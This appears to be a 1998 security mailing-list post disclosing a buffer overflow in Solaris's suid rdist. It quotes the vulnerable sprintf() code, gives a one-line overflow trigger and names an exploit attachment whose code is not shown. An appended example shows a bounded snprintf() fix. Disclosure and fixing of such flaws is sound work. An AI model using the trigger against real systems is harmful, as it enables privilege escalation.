Date: Wed, 12 Aug 1998 20:20:03 -0400
From: John McDonald <[email protected]>
To: [email protected]
Subject: solaris 2.x rdist exploit / too many humbles :p
Enclosed is an exploit for a hole in Solaris rdist that I believe the
patch #105667-01 addresses. That patch is for 2.6. I've personally tested
the exploit on 2.6, 2.5.1, and 2.5 machines. I'm not sure if that is the
right patch, but I'm pretty sure this hole has been fixed.
You can see the hole if you look at the BSD source for rdist, which is
apparently pretty similar to the code Sun used. The vulnerability is in
expand.c, which you can look at here:
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c?rev=1.5
Part of the program's functionality is to allow a user to define
variables and reference them in a way similar to environment variables.
The problem comes in when the program attempts to substitute the symbol
representing the variable with its value. You should be able to see this
by doing: rdist -d bleh=AAAAA(lotsa lotsa A's) -c /tmp/ '${bleh}'
In the function expstr(), we have

    if (tp != NULL) {
        for (; tp != NULL; tp = tp->n_next) {
            (void) sprintf((char *)ebuf,
                "%s%s%s", s, tp->n_name, tail);
            expstr(ebuf);
        }
        return;
    }
A little higher in the code, we see:

    u_char ebuf[BUFSIZ];
This is obviously a bad thing. BTW, none of the BSDs or Linuxes are
vulnerable to any rdist hole to the best of my knowledge because the binary
isn't suid.
My nick used to be humble, but as of reading bugtraq yesterday, I can see
that someone else is partial to the name. In order to alleviate
confusion, (and to possibly deflect emails about how to "run
ufsrestore.c" to him :p), I'll change my nick. And looking at this last
post, I don't think I want to inherit his enemies. :>
horizon
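Added example (not part of the original post or of rdist's source): the unbounded sprintf() pattern from the expstr() fragment above, modelled beside a bounded replacement that checks snprintf()'s return value and refuses an expansion that would not fit in a BUFSIZ-sized ebuf. The function names and the constructed 2*BUFSIZ-byte variable value are assumptions for this demo.

```c
/* Models rdist's expstr() substitution: sprintf(ebuf, "%s%s%s", s, name, tail)
 * into u_char ebuf[BUFSIZ], where "name" is the user-supplied variable value.
 * Function names here are assumptions for the demo, not rdist's own. */
#include <stdio.h>
#include <string.h>

#define EBUF_SIZE BUFSIZ   /* rdist's ebuf is u_char ebuf[BUFSIZ] (BUFSIZ from <stdio.h>) */

/* Number of bytes the original unbounded sprintf() would write, NUL excluded,
 * computed without touching any buffer. */
size_t expand_unbounded_len(const char *s, const char *name, const char *tail)
{
    return strlen(s) + strlen(name) + strlen(tail);
}

/* 1 if the original sprintf() would run past an ebuf of EBUF_SIZE bytes. */
int original_would_overflow(const char *s, const char *name, const char *tail)
{
    return expand_unbounded_len(s, name, tail) + 1 > EBUF_SIZE;
}

/* Bounded replacement: snprintf() plus an explicit length check, so an
 * over-long expansion is rejected rather than silently truncated or written
 * past the end of the buffer. Returns 1 on success, 0 on rejection. */
int expand_bounded(char *out, size_t outsz,
                   const char *s, const char *name, const char *tail)
{
    int n = snprintf(out, outsz, "%s%s%s", s, name, tail);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return 0;
    }
    return 1;
}

/* Constructed input: a variable value of 2*BUFSIZ 'A's, like the
 * "rdist -d bleh=AAAA..." reproduction above. Returns 1 when the original
 * pattern would overflow and the bounded version refuses the expansion. */
int demo(void)
{
    static char value[2 * BUFSIZ + 1];
    char ebuf[EBUF_SIZE];
    memset(value, 'A', sizeof value - 1);
    value[sizeof value - 1] = '\0';
    int overflow = original_would_overflow("", value, "");
    int ok = expand_bounded(ebuf, sizeof ebuf, "", value, "");
    return overflow && !ok;
}
```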
[Attachment: t4.c]